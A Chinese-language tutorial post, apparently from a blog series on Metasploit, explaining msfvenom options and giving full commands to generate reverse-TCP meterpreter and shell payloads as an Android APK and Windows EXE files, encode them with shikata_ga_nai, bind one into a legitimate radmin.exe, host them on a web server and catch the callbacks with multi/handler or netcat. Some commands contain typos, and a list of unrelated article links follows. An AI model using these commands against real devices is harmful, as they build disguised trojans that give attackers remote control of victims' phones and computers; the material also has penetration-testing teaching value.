6.Metasploit生成apk攻击Android实例
Metasploit进阶第四讲 生成Android apk文件
01 msfvenom基本参数
msfvenom介绍
承接上回,staged/unstage payload如何利用?
msfvenom是msfpayload及msfencode的结合体,可利用msfvenom将payload封装为木马程序,并在目标机上执行,在本地监听上线。
msfvenom基本参数
msfvenom -h
-p ->指定payload
-1 ->列出所有可用项
-f ->指定文件输出格式
-e ->指定编码格式
-a ->选择架构平台
-o ->选择文件输出路径,包含文件名
-s ->指定生成的payload最大大小
-b ->避免使用的字符
-I ->指定编码次数
-c ->添加自己的shellcode
-xxxx.exc -k ->捆绑文件到xxx.cxc
以下使用msfvenom分别是什么意思?
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545
-e x86/shikata_ga_nai –I 3 –f exe -o abc.exe
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545
-b ‘\×00xff' –I 3 –f exe -o abc.exe
Msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545
-e x86/shikata_ga_nai –k –x /usr/share/windows-binaries/radmin.exe –f exe -o radmin.exe
msfvenom生成apk文件
staged payload:
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.1.1.169 LPORT=4545
R>/var/www/html/Lliang.apk
metasploit:
use exploit/multi/handler 加载模块
set payload android/meterpreter/reverse_tcp 选择Payload
set LHOST10.1.1.169这里的地址设置成我
们刚配置木马的IP地址
set LPORT4545这里的端口设置成刚才我们
配置木马所监听的端口
unstage payload:
msfvenom –p windows/shell_reverse_tcp LHOST=10.1.1.169 LPORT=4545
-f exe –o /var/www/html/shell-stageless.exe
metasploit:
use exploit/multi/handler加载模块
set payload windows/shell_reverse_tcp 选择Payload
unstage payload:
msfvenom -p windows/shell reverse_tcp LHOST=10.1.1.169 LPORT=4545 -f exe -o /var/www/html/shell-stageless.exe
netcat:在两台电脑之润建立链接并返回两个数据流
nc -lyp 4545 -监听4545端口
-v/-vw 显示指令执行过程
-l 使用监听模式,管控传入的资料
-p 设置本地主机使用的通信端口
staged payload不适用于netcat,必须使用Metasploit的exploit/multi/handler模块。要从主机上的metasploit handler上下载完整的payload
最新文章
- MonogDB初探增加和删除
- uct框架数据库sql文件导入错误之 sql_mode
- Linux环境下Nginx配置安装PHP
- disabled和readonly的区别?
- hdu 4641 K-string SAM的O(n^2)算法 以及 SAM+并查集优化
- 开源html5_kiwijs_helloworld
- 为代码减负之&;lt;二&;gt;存储过程(SQL)
- Design Patterns in Smalltalk MVC 在Smalltalk的MVC设计模式
- idea 给maven项目添加依赖(二)
- MongoDB入门系列(一):基础概念和安装
- [bzoj4410] [Usaco2016 Feb]Fence in
- python小技巧---打印出不同颜色的输出
- 《Linux就该这么学》第五天课程
- CSS矩形盒子的四个边界
- Harbor私有镜像仓库无坑搭建
- 我的第一个Raspberry PI装置
- 多个git账号之间的切换
- vim markdown
- 码农小汪-Hibernate学习8-hibernate关联关系注解表示@OneToMany mappedBy @ManyToMany @JoinTable
- (转)Web系统大规模并发——电商秒杀与抢购
热门文章
- Hibernage错误:Could not open Hibernate Session for transaction
- href=";#";和href=“javascript:void(0)”的区别
- ASP.NETMVC中js非空验证实例
- Flink系列之1.10版流式SQL应用
- JVM系列八(虚拟机性能监控命令).
- C++ 结构体sturct练习
- js 实现简单的导航下拉列表
- GO系列 | 5分钟入门GO【译】
- python之 filter
- VS2008文件编码格式修改